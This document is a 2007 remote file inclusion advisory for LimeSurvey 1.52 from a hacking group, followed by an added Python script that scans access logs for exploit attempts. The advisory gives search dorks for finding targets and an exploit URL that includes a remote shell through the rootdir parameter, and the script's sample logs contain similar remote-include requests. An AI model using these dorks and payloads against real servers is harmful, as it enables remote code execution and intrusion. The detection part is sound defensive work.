LimeSurvey versions 1.52 and below suffer from a remote file inclusion vulnerability.
265d5167d6be0eb574e84294ebecbf040ce54de728cca6d7d9416bc8f5d3f2e2
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
Download : http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : "You have not provided a survey identification number"
Dork2 : "LimeSurvey"
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($rootdir.'/classes/php-gettext/gettext.php');
require_once($rootdir.'/classes/php-gettext/streams.php');
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
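
A detection sketch for the request pattern above, added here as an example (it is not part of the original advisory or of LimeSurvey): it scans web server access logs for requests to `classes/core/language.php` that carry a `rootdir` parameter and separates values naming a remote location or stream wrapper from other values. The log format (common/combined), the sample lines, the `/survey/` prefix and the verdict labels are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address and request target of a common/combined-format log entry.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
VULN_SCRIPT = "/classes/core/language.php"  # script named in the advisory
PARAM = "rootdir"                           # variable named in the advisory
# URL scheme or stream wrapper (2+ chars, so "C:" is not matched), or a // or \\ share.
REMOTE_RE = re.compile(r"^\s*([a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)

def classify(target):
    """Return None, 'rootdir-supplied' or 'rootdir-remote' for a request target."""
    parts = urlsplit(target)
    # Normalise the path: percent-encoding, doubled slashes and upper case must not hide it.
    path = re.sub(r"/+", "/", unquote(parts.path).replace("\\", "/")).lower()
    if not (path.endswith(VULN_SCRIPT) or VULN_SCRIPT + "/" in path):
        return None
    verdict = None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl has percent-decoded name and value; PHP variable names are
        # case-sensitive, so only an exact "rootdir" (or "rootdir[...]") counts.
        if name.split("[", 1)[0] != PARAM:
            continue
        if REMOTE_RE.match(value):
            return "rootdir-remote"
        verdict = "rootdir-supplied"
    return verdict

def scan(lines):
    """Return (line_number, client, verdict) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        verdict = classify(m.group("target")) if m else None
        if verdict:
            hits.append((number, m.group("client"), verdict))
    return hits

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Oct/2007:10:00:01 +0000] "GET /survey/index.php?sid=12345 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/Oct/2007:10:02:13 +0000] "GET /survey/classes/core/language.php?rootdir=http://host.invalid/x HTTP/1.1" 200 312',
    '198.51.100.7 - - [16/Oct/2007:10:02:20 +0000] "GET /survey/classes/core/language.php?%72ootdir=ftp%3A%2F%2Fhost.invalid%2Fx HTTP/1.0" 200 0',
    '203.0.113.5 - - [16/Oct/2007:10:05:44 +0000] "GET /survey/classes/core/language.php?rootdir=/tmp HTTP/1.1" 500 0',
    '192.0.2.10 - - [16/Oct/2007:10:06:02 +0000] "GET /survey/classes/core/language.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any `rootdir` value in a URL is worth a look, since the vulnerable lines use `$rootdir` only as a path prefix for `require_once`. The scan covers only what the access log records, i.e. the request line.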